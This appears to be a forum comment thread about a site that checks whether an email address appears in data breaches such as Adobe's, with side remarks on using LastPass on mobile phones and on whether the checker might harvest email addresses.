Yup, works great, I've been using it for over a year. To login to banking on your phone, you first go to the Lastpass app, login to that, then copy the password to your bank, open their app, and paste the password in. Lastpass for Android also now has a notification that stays up while you're logged in, to remind you to log back out when you're done.

That's the way that it worked when I first started using it, but am I the only person using the full Lastpass browser these days? It's far more convenient than the old Authenticator -> Lastpass -> Browser authentication workflow that I had to use before the upgrade.

They have a mobile site, and if you get the premium subscription ($12/year?) you can use their mobile apps - I use the iOS and Windows Phone apps and both are very smooth. (They also have Android and Blackberry).

They could just query against the MD5 of your email instead, if it's a match they already had your email anyways :)

This is very cool. I didn't even think of my adobe account when the breach happened, since I used it so long ago.

If you want to see what it looks like when your email address has been pwned I tried lol@lol.com and got back 4 hits.

The real zinger - when you enter your email address to check, they store it and steal your identity :P

This site is BS, I put in a BS email and it still says I was part of an Adobe password breach!!!

Even if it was a BS email, it could have been a part of the db. You'd be surprised at the kind of BS email addresses in the adobe dump. There are ~1K people who provided an @a.com email address.

I got three hits for president@whitehouse.gov.

People put in bogus addresses when they register for things. I have a domain that is similar to a common mash on the keyboard, and I get a steady stream of backscatter from people signing up to things with crap@keyboardmash.org.

asdf.com? qwerty.org? Please don't leave us hanging :P

Pwned on amazon too. Thankfully it was a demo account, with an old email and password.

Gmail also tells you your last account activity at the bottom of the page.

We send emails to all of our customers who end up in these breaches as well.

This looks like a brilliant way for spammers to collect e-mail addresses...

Pwned on Adobe's website too.

My spam url and my real one, goddamned.

How do I know this isn't a scam for collecting e-mail addresses for spam purposes?

Adobe needs to be extinguished.

Any plans to add LinkedIn?

I thought emails weren't disclosed in the LinkedIn breach? You can check your password over at https://lastpass.com/linkedin/

Where's the API?

God damn it Adobe!

enter your email to get pwned
